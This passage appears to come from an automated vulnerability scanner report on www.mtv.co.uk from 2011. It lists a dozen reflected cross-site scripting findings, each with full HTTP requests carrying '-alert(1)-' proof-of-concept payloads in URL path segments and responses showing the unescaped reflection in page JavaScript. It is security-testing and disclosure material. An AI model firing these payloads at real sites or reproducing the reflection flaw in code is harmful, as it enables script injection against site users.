dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.103. http://www.mtv.co.uk/sites/all/modules/gsa/opensearch.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/modules/gsa/opensearch.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd3bd"-alert(1)-"d480e12847b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sitesdd3bd"-alert(1)-"d480e12847b/all/modules/gsa/opensearch.xml HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:52 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13447
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:52 GMT
Date: Mon, 12 Sep 2011 12:50:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
om.mtvi.reporting.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sitesdd3bd"-alert(1)-"d480e12847b/all/modules/gsa/opensearch.xml");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttri
...[SNIP]...

2.104. http://www.mtv.co.uk/sites/all/modules/gsa/opensearch.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/modules/gsa/opensearch.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88542"-alert(1)-"d7718f9560d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all88542"-alert(1)-"d7718f9560d/modules/gsa/opensearch.xml HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:59 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13445
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:51:02 GMT
Date: Mon, 12 Sep 2011 12:51:02 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
tvi.reporting.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all88542"-alert(1)-"d7718f9560d/modules/gsa/opensearch.xml");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute
...[SNIP]...

2.105. http://www.mtv.co.uk/sites/all/modules/gsa/opensearch.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/modules/gsa/opensearch.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40c5d"-alert(1)-"39abbfac80 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules40c5d"-alert(1)-"39abbfac80/gsa/opensearch.xml HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:51:12 GMT
Debug: lnioxp009wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13439
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:51:13 GMT
Date: Mon, 12 Sep 2011 12:51:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
rting.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/modules40c5d"-alert(1)-"39abbfac80/gsa/opensearch.xml");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10
...[SNIP]...

2.106. http://www.mtv.co.uk/sites/all/modules/gsa/opensearch.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/modules/gsa/opensearch.xml

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7899"-alert(1)-"456b488dfcc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/gsaf7899"-alert(1)-"456b488dfcc/opensearch.xml HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:51:38 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13439
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:51:38 GMT
Date: Mon, 12 Sep 2011 12:51:38 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
g.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/modules/gsaf7899"-alert(1)-"456b488dfcc/opensearch.xml");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "
...[SNIP]...

2.107. http://www.mtv.co.uk/sites/all/modules/gsa/opensearch.xml [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/modules/gsa/opensearch.xml

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d010"-alert(1)-"bf7411a02bc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/gsa/opensearch.xml9d010"-alert(1)-"bf7411a02bc HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Last-Modified: Mon, 12 Sep 2011 12:51:47 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13439
Vary: Accept-Encoding
Expires: Mon, 12 Sep 2011 12:51:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 12 Sep 2011 12:51:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...

com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/modules/gsa/opensearch.xml9d010"-alert(1)-"bf7411a02bc");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.108. http://www.mtv.co.uk/sites/all/modules/mtv_videobrowse/mtv_videobrowse.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/modules/mtv_videobrowse/mtv_videobrowse.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25ac1"-alert(1)-"0a5748c1d7d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/mtv_videobrowse/25ac1"-alert(1)-"0a5748c1d7d?1274367484 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:05 GMT
Debug: lnioxp009wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13437
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:05 GMT
Date: Mon, 12 Sep 2011 12:50:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
);
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/modules/mtv_videobrowse/25ac1"-alert(1)-"0a5748c1d7d");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.109. http://www.mtv.co.uk/sites/all/modules/nice_menus/nice_menus.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/modules/nice_menus/nice_menus.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d83e"-alert(1)-"d0b389f7668 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/nice_menus/7d83e"-alert(1)-"d0b389f7668?1234890325 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:05 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13431
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:05 GMT
Date: Mon, 12 Sep 2011 12:50:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
cher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/modules/nice_menus/7d83e"-alert(1)-"d0b389f7668");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.110. http://www.mtv.co.uk/sites/all/modules/nice_menus/nice_menus_default.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/modules/nice_menus/nice_menus_default.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b42df"-alert(1)-"7b9aaed79b2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/nice_menus/b42df"-alert(1)-"7b9aaed79b2?1309439822 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:01 GMT
Debug: lnioxp009wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13431
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:02 GMT
Date: Mon, 12 Sep 2011 12:50:02 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
cher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/modules/nice_menus/b42df"-alert(1)-"7b9aaed79b2");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.111. http://www.mtv.co.uk/sites/all/modules/top_tabs/top_tabs.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/modules/top_tabs/top_tabs.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98e58"-alert(1)-"5d8b7fc99da was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/top_tabs/98e58"-alert(1)-"5d8b7fc99da?1244458641 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:07 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13421
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:07 GMT
Date: Mon, 12 Sep 2011 12:50:07 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
atcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/modules/top_tabs/98e58"-alert(1)-"5d8b7fc99da");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.112. http://www.mtv.co.uk/sites/all/modules/user_optin/user_optin.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/modules/user_optin/user_optin.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9dbf9"-alert(1)-"7de6b6466d6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/user_optin/9dbf9"-alert(1)-"7de6b6466d6?1241187880 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:05 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13427
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:05 GMT
Date: Mon, 12 Sep 2011 12:50:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
cher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/modules/user_optin/9dbf9"-alert(1)-"7de6b6466d6");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.113. http://www.mtv.co.uk/sites/all/themes/mtvuk/blueprint/blueprint/print.css [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/themes/mtvuk/blueprint/blueprint/print.css

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b08dd"-alert(1)-"477bf834596 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/themes/mtvuk/blueprint/blueprint/b08dd"-alert(1)-"477bf834596?1234890284 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:07 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13455
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:07 GMT
Date: Mon, 12 Sep 2011 12:50:07 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
m.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/themes/mtvuk/blueprint/blueprint/b08dd"-alert(1)-"477bf834596");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.114. http://www.mtv.co.uk/sites/all/themes/mtvuk/blueprint/blueprint/screen.css [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/themes/mtvuk/blueprint/blueprint/screen.css

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13e42"-alert(1)-"a0ad2d31b48 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/themes/mtvuk/blueprint/blueprint/13e42"-alert(1)-"a0ad2d31b48?1235581642 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
